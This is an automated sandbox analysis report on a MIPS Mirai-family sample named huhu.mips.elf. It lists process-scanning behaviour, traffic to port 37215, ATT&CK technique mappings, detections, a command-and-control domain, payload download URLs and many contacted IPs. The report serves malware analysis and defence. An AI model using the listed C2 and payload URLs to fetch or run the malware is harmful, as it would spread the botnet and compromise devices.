            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/18/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/19/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1593/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/240/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/120/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/3094/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/121/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/242/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/3406/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/122/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/243/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/2/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/123/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/244/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1589/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/3/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/124/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/245/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1588/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/125/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/4/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/246/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/3402/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/126/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/5/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/247/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/127/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/6/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/248/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/128/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/7/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/249/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/8/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/129/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/800/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/9/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/801/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/803/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/20/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/806/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/21/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/807/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/928/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/22/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/23/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/24/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/25/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/26/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/27/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/28/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/29/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/3420/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/490/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/250/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/130/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/251/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/131/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/252/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/132/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/253/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/254/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/255/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/135/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/256/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1599/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/257/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/378/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/258/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/3412/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/259/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/30/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/35/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/1371/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/260/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/261/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/262/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/142/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/263/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/264/cmdlineJump to behavior
            Source: /tmp/huhu.mips.elf (PID: 5523)File opened: /proc/265/cmdlineJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 48190 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 41288 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 49394
            Source: unknownNetwork traffic detected: HTTP traffic on port 47874 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 36238 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 43734 -> 37215
            Source: /tmp/huhu.mips.elf (PID: 5517)Queries kernel information via 'uname': Jump to behavior
            Source: huhu.mips.elf, 5517.1.0000555bac56d000.0000555bac5f4000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
            Source: huhu.mips.elf, 5517.1.00007ffee636c000.00007ffee638d000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
            Source: huhu.mips.elf, 5517.1.00007ffee636c000.00007ffee638d000.rw-.sdmpBinary or memory string: mx86_64/usr/bin/qemu-mips/tmp/huhu.mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/huhu.mips.elf
            Source: huhu.mips.elf, 5517.1.0000555bac56d000.0000555bac5f4000.rw-.sdmpBinary or memory string: [U!/etc/qemu-binfmt/mips

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: huhu.mips.elf, type: SAMPLE
            Source: Yara matchFile source: 5517.1.00007f2b14400000.00007f2b1442a000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: huhu.mips.elf PID: 5517, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: huhu.mips.elf, type: SAMPLE
            Source: Yara matchFile source: 5517.1.00007f2b14400000.00007f2b1442a000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: huhu.mips.elf PID: 5517, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path InterceptionDirect Volume Access1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging3
            Ingress Tool Transfer
            Scheduled TransferData Encrypted for Impact
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1385365 Sample: huhu.mips.elf Startdate: 02/02/2024 Architecture: LINUX Score: 84 30 41.23.40.230 VODACOM-ZA South Africa 2->30 32 41.27.51.181 VODACOM-ZA South Africa 2->32 34 99 other IPs or domains 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Antivirus / Scanner detection for submitted sample 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 2 other signatures 2->42 8 huhu.mips.elf 2->8         started        10 gnome-session-binary sh gsd-print-notifications 2->10         started        12 gdm3 Default 2->12         started        14 2 other processes 2->14 signatures3 process4 process5 16 huhu.mips.elf 8->16         started        18 gsd-print-notifications 10->18         started        process6 20 huhu.mips.elf 16->20         started        22 huhu.mips.elf 16->22         started        24 huhu.mips.elf 16->24         started        28 2 other processes 16->28 26 gsd-print-notifications gsd-printer 18->26         started       
            SourceDetectionScannerLabelLink
            huhu.mips.elf47%VirustotalBrowse
            huhu.mips.elf100%AviraEXP/ELF.Agent.Gen.J
            No Antivirus matches
            SourceDetectionScannerLabelLink
            haha.skyljne.click12%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://103.180.149.156/huhu.mpsl;0%Avira URL Cloudsafe
            http://103.180.149.156/huhu.mips;$0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            haha.skyljne.click
            45.142.182.123
            truefalseunknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://103.180.149.156/huhu.mips;$huhu.mips.elffalse
            • Avira URL Cloud: safe
            unknown
            http://103.180.149.156/huhu.mpsl;huhu.mips.elffalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/soap/encoding/huhu.mips.elffalse
              high
              http://schemas.xmlsoap.org/soap/envelope/huhu.mips.elffalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                157.144.111.126
                unknownFinland
                719ELISA-ASHelsinkiFinlandEUfalse
                34.167.178.21
                unknownUnited States
                2686ATGS-MMD-ASUSfalse
                191.245.222.215
                unknownBrazil
                22085ClaroSABRfalse
                212.200.149.31
                unknownSerbia
                8400TELEKOM-ASRSfalse
                41.122.114.241
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                99.126.165.33
                unknownUnited States
                7018ATT-INTERNET4USfalse
                161.122.238.16
                unknownKorea Republic of
                17866KISTNET-AS-KRKoreaInstituteofScienceandTechnologyKRfalse
                197.184.187.179
                unknownSouth Africa
                37105NEOLOGY-ASZAfalse
                44.7.130.187
                unknownUnited States
                7377UCSDUSfalse
                4.72.196.123
                unknownUnited States
                3356LEVEL3USfalse
                157.162.118.73
                unknownGermany
                22192SSHENETUSfalse
                81.119.247.65
                unknownItaly
                20746ASN-IDCTNOOMINCITfalse
                157.203.98.32
                unknownUnited Kingdom
                1759TSF-IP-CORETeliaFinlandOyjEUfalse
                115.75.170.84
                unknownViet Nam
                7552VIETEL-AS-APViettelGroupVNfalse
                197.132.217.154
                unknownEgypt
                24835RAYA-ASEGfalse
                41.97.145.254
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                99.185.36.95
                unknownUnited States
                7018ATT-INTERNET4USfalse
                201.9.47.43
                unknownBrazil
                7738TelemarNorteLesteSABRfalse
                137.61.105.185
                unknownSweden
                15991SWEDISH_TAX_AGENCYIT-departmentKortagatan10SE-17194Solfalse
                71.233.124.145
                unknownUnited States
                7922COMCAST-7922USfalse
                12.42.125.77
                unknownUnited States
                7018ATT-INTERNET4USfalse
                41.105.231.103
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                202.109.217.20
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                24.181.167.150
                unknownUnited States
                20115CHARTER-20115USfalse
                72.81.45.160
                unknownUnited States
                701UUNETUSfalse
                144.171.98.193
                unknownUnited States
                7301NAS-ASUSfalse
                130.22.51.19
                unknownUnited States
                27064DNIC-ASBLK-27032-27159USfalse
                141.113.232.27
                unknownGermany
                31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                41.195.197.29
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                25.148.190.134
                unknownUnited Kingdom
                7922COMCAST-7922USfalse
                79.61.148.79
                unknownItaly
                3269ASN-IBSNAZITfalse
                219.93.151.21
                unknownMalaysia
                4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                125.94.208.187
                unknownChina
                58543CHINATELECOM-GUANGDONG-IDCGuangdongCNfalse
                116.181.7.221
                unknownChina
                133119UNICOM-CNChinaUnicomIPnetworkCNfalse
                41.27.51.181
                unknownSouth Africa
                29975VODACOM-ZAfalse
                120.63.100.93
                unknownIndia
                17813MTNL-APMahanagarTelephoneNigamLimitedINfalse
                152.11.143.96
                unknownUnited States
                81NCRENUSfalse
                198.40.41.67
                unknownUnited States
                26854NYSUSfalse
                43.22.215.10
                unknownJapan4249LILLY-ASUSfalse
                133.151.173.14
                unknownJapan10021KVHKVHCoLtdJPfalse
                41.87.198.66
                unknownSouth Africa
                37315CipherWaveZAfalse
                120.12.56.187
                unknownChina
                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                168.191.119.7
                unknownUnited States
                46255CHARLOTTE-MECKLENBURG-SCHOOLS-NCUSfalse
                64.69.134.9
                unknownUnited States
                53862MCDANIELCOLLEGEUSfalse
                116.120.160.157
                unknownKorea Republic of
                9318SKB-ASSKBroadbandCoLtdKRfalse
                47.238.182.20
                unknownUnited States
                20115CHARTER-20115USfalse
                131.99.122.24
                unknownGermany
                8767MNET-ASGermanyDEfalse
                157.196.52.1
                unknownUnited States
                4704SANNETRakutenMobileIncJPfalse
                63.96.126.29
                unknownUnited States
                701UUNETUSfalse
                25.45.219.201
                unknownUnited Kingdom
                7922COMCAST-7922USfalse
                145.102.207.244
                unknownNetherlands
                1103SURFNET-NLSURFnetTheNetherlandsNLfalse
                197.202.209.187
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                62.33.162.92
                unknownRussian Federation
                20485TRANSTELECOMMoscowRussiaRUfalse
                212.107.139.139
                unknownSweden
                33885OWNITKatarinavagen15SEfalse
                70.8.7.27
                unknownUnited States
                10507SPCSUSfalse
                194.78.238.157
                unknownBelgium
                5432PROXIMUS-ISP-ASBEfalse
                61.144.54.183
                unknownChina
                4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                41.72.33.23
                unknownAngola
                37155NETONEAOfalse
                41.45.223.172
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                222.139.186.198
                unknownChina
                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                143.129.234.184
                unknownBelgium
                2611BELNETBEfalse
                37.252.171.223
                unknownEuropean Union
                29990ASN-APPNEXUSfalse
                135.47.25.163
                unknownUnited States
                54614CIKTELECOM-CABLECAfalse
                144.205.100.43
                unknownAustralia
                7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                138.119.70.217
                unknownCanada
                611NECN-1-611CAfalse
                128.225.44.122
                unknownUnited States
                36441UGA-ASNUSfalse
                5.244.19.206
                unknownSaudi Arabia
                34400ASN-ETTIHADETISALATSAfalse
                38.217.51.245
                unknownUnited States
                174COGENT-174USfalse
                157.215.69.17
                unknownUnited States
                4704SANNETRakutenMobileIncJPfalse
                93.123.76.50
                unknownBulgaria
                43561NET1-ASBGfalse
                116.13.183.131
                unknownChina
                4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                41.23.40.230
                unknownSouth Africa
                29975VODACOM-ZAfalse
                154.181.108.47
                unknownEgypt
                8452TE-ASTE-ASEGfalse
                193.57.2.144
                unknownGermany
                197637ROPAropadigitalsystemsDEfalse
                148.9.67.42
                unknownUnited States
                3745NTTDATA-SERVICES-AS2USfalse
                197.202.209.171
                unknownAlgeria
                36947ALGTEL-ASDZfalse
                2.55.156.185
                unknownIsrael
                12400PARTNER-ASILfalse
                41.122.213.33
                unknownSouth Africa
                16637MTNNS-ASZAfalse
                99.161.21.96
                unknownUnited States
                7018ATT-INTERNET4USfalse
                108.68.37.103
                unknownUnited States
                7018ATT-INTERNET4USfalse
                74.27.48.178
                unknownUnited States
                7922COMCAST-7922USfalse
                62.81.143.66
                unknownSpain
                6739ONO-ASCableuropa-ONOESfalse
                42.30.100.77
                unknownKorea Republic of
                9644SKTELECOM-NET-ASSKTelecomKRfalse
                152.221.181.246
                unknownUnited States
                30313IRSUSfalse
                162.173.222.164
                unknownUnited States
                21928T-MOBILE-AS21928USfalse
                148.146.210.2
                unknownUnited States
                18715NYPAUSfalse
                139.211.92.94
                unknownChina
                4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                197.4.29.66
                unknownTunisia
                5438ATI-TNfalse
                94.204.241.16
                unknownUnited Arab Emirates
                15802DU-AS1AEfalse
                75.27.129.123
                unknownUnited States
                7018ATT-INTERNET4USfalse
                197.159.104.76
                unknownKenya
                37421CellulantKEfalse
                122.23.24.5
                unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                148.247.51.137
                unknownMexico
                3548CentrodeInvestigacionydeEstudiosAvanzadosdelMXfalse
                170.165.147.43
                unknownSingapore
                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                47.254.32.239
                unknownUnited States
                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                167.226.50.104
                unknownUnited States
                2897GEORGIA-1USfalse
                91.125.113.253
                unknownUnited Kingdom
                6871PLUSNETUKInternetServiceProviderGBfalse
                50.27.79.90
                unknownUnited States
                19108SUDDENLINK-COMMUNICATIONSUSfalse
                179.248.78.212
                unknownBrazil
                26615TIMSABRfalse
                160.58.147.85
                unknownGermany
                12291DPAG-ASDeutschePostAGDEfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                197.184.187.179x86.elfGet hashmaliciousMiraiBrowse
                  W1233piITqGet hashmaliciousMiraiBrowse
                    212.200.149.31rkRlRX02WKGet hashmaliciousMiraiBrowse
                      157.162.118.73IWE7T4iPdS.elfGet hashmaliciousMiraiBrowse
                        Ctf1c2lu1B.elfGet hashmaliciousMiraiBrowse
                          KLAbE2XW4iGet hashmaliciousMiraiBrowse
                            UnHAnaAW.x86Get hashmaliciousMiraiBrowse
                              41.122.114.241z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                nmiNgB1vO6Get hashmaliciousMiraiBrowse
                                  34jU7VJQ0aGet hashmaliciousMiraiBrowse
                                    armGet hashmaliciousMiraiBrowse
                                      157.203.98.32YNOiamVgDZ.elfGet hashmaliciousMiraiBrowse
                                        115.75.170.84faecha.x86.elfGet hashmaliciousMiraiBrowse
                                          x86.elfGet hashmaliciousMirai, MoobotBrowse
                                            197.132.217.154oFdYu6RyDI.elfGet hashmaliciousMirai, MoobotBrowse
                                              U4HipSF3yX.elfGet hashmaliciousMiraiBrowse
                                                9knJQfYMP8Get hashmaliciousMiraiBrowse
                                                  ZwRK4AtIl9Get hashmaliciousGafgyt MiraiBrowse
                                                    x86Get hashmaliciousMiraiBrowse
                                                      IShdNa9m4EGet hashmaliciousGafgyt MiraiBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        haha.skyljne.clickhuhu.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        huhu.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        huhu.arm.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        huhu.x86_64.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        Kfak0qsHSB.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        Jv6tQ2Xibw.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        S8kyTAF7c9.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        fFJrtfaPIg.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        huhu.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        huhu.arm5.elfGet hashmaliciousMiraiBrowse
                                                        • 45.142.182.123
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ClaroSABR4bhVRVQSgv.elfGet hashmaliciousMiraiBrowse
                                                        • 187.105.178.8
                                                        L7WtUZpZ67.elfGet hashmaliciousMiraiBrowse
                                                        • 187.37.67.174
                                                        3yPAKl30XU.elfGet hashmaliciousMiraiBrowse
                                                        • 189.33.141.82
                                                        L3We5oYYzp.elfGet hashmaliciousMiraiBrowse
                                                        • 187.23.126.59
                                                        iinno2JfXz.elfGet hashmaliciousMiraiBrowse
                                                        • 201.6.129.109
                                                        RdBKbRSLCG.elfGet hashmaliciousMiraiBrowse
                                                        • 179.232.147.201
                                                        hLjMKRjHyH.elfGet hashmaliciousMiraiBrowse
                                                        • 201.81.230.235
                                                        zMUbHUOE2q.elfGet hashmaliciousMiraiBrowse
                                                        • 201.53.53.72
                                                        t3WYi23MYZ.elfGet hashmaliciousMiraiBrowse
                                                        • 186.204.161.210
                                                        oQjzsie09N.elfGet hashmaliciousMiraiBrowse
                                                        • 187.23.102.60
                                                        ELISA-ASHelsinkiFinlandEUhuhu.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 195.236.51.107
                                                        iCyH8dSeOS.elfGet hashmaliciousUnknownBrowse
                                                        • 141.127.181.134
                                                        Jj7MASU4Xd.elfGet hashmaliciousMiraiBrowse
                                                        • 157.152.125.241
                                                        K46lj7Z4aM.elfGet hashmaliciousUnknownBrowse
                                                        • 91.154.217.250
                                                        iinno2JfXz.elfGet hashmaliciousMiraiBrowse
                                                        • 62.142.41.41
                                                        Kfak0qsHSB.elfGet hashmaliciousMiraiBrowse
                                                        • 193.65.158.209
                                                        pKO4Qel23K.elfGet hashmaliciousMiraiBrowse
                                                        • 195.255.160.130
                                                        O6bD7qqVXE.elfGet hashmaliciousMiraiBrowse
                                                        • 80.186.12.224
                                                        t3WYi23MYZ.elfGet hashmaliciousMiraiBrowse
                                                        • 85.76.69.130
                                                        TELEKOM-ASRSFgN5671EAq.elfGet hashmaliciousUnknownBrowse
                                                        • 109.93.37.67
                                                        vQyQaHKU0U.elfGet hashmaliciousGafgytBrowse
                                                        • 93.86.78.210
                                                        skyljne.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 79.101.254.106
                                                        dltG0b9lTw.elfGet hashmaliciousMiraiBrowse
                                                        • 212.200.137.38
                                                        Hzz3H18f6f.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 212.200.149.69
                                                        Rakitin.x86.elfGet hashmaliciousMiraiBrowse
                                                        • 178.222.54.105
                                                        Rakitin.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 178.222.54.127
                                                        MmVwe8fCiq.elfGet hashmaliciousMiraiBrowse
                                                        • 79.175.73.89
                                                        ZhhHfkNewm.elfGet hashmaliciousMiraiBrowse
                                                        • 212.200.149.67
                                                        F9xLv7ea2d.elfGet hashmaliciousMiraiBrowse
                                                        • 178.222.54.108
                                                        ATGS-MMD-ASUShuhu.arm7.elfGet hashmaliciousMiraiBrowse
                                                        • 48.33.209.229
                                                        huhu.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 34.24.22.22
                                                        iCyH8dSeOS.elfGet hashmaliciousUnknownBrowse
                                                        • 48.216.35.135
                                                        4bhVRVQSgv.elfGet hashmaliciousMiraiBrowse
                                                        • 32.93.107.93
                                                        FgN5671EAq.elfGet hashmaliciousUnknownBrowse
                                                        • 32.85.217.168
                                                        L7WtUZpZ67.elfGet hashmaliciousMiraiBrowse
                                                        • 34.11.95.207
                                                        coYnMdoXNc.elfGet hashmaliciousMiraiBrowse
                                                        • 32.240.217.91
                                                        yCUczQYIGe.elfGet hashmaliciousMiraiBrowse
                                                        • 195.33.134.136
                                                        3yPAKl30XU.elfGet hashmaliciousMiraiBrowse
                                                        • 34.179.66.128
                                                        ObUU1dYiZQ.elfGet hashmaliciousMiraiBrowse
                                                        • 48.225.70.223
                                                        No context
                                                        No context
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
                                                        SHA-256:E5B3041530054148FB011CCE25330EED1566374141CF772E489302A09F2CDB12
                                                        SHA-512:64FEC72D28417CF116A38D9AC4346033BBBAC6571C659C9151B8F969EEED02891C016FA38DF51934202D5019083DCD24DE23F2368523AE37E5DFD6437E7CD4A7
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:/tmp/huhu.mips.elf.
                                                        Process:/tmp/huhu.mips.elf
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):19
                                                        Entropy (8bit):3.6163485660751653
                                                        Encrypted:false
                                                        SSDEEP:3:TgCG8Cn:TgCVC
                                                        MD5:634DBC35A43FD60E905F21F730C94C68
                                                        SHA1:F57DCB5260325FF0D3B75FA1F9E4D3A71D924206
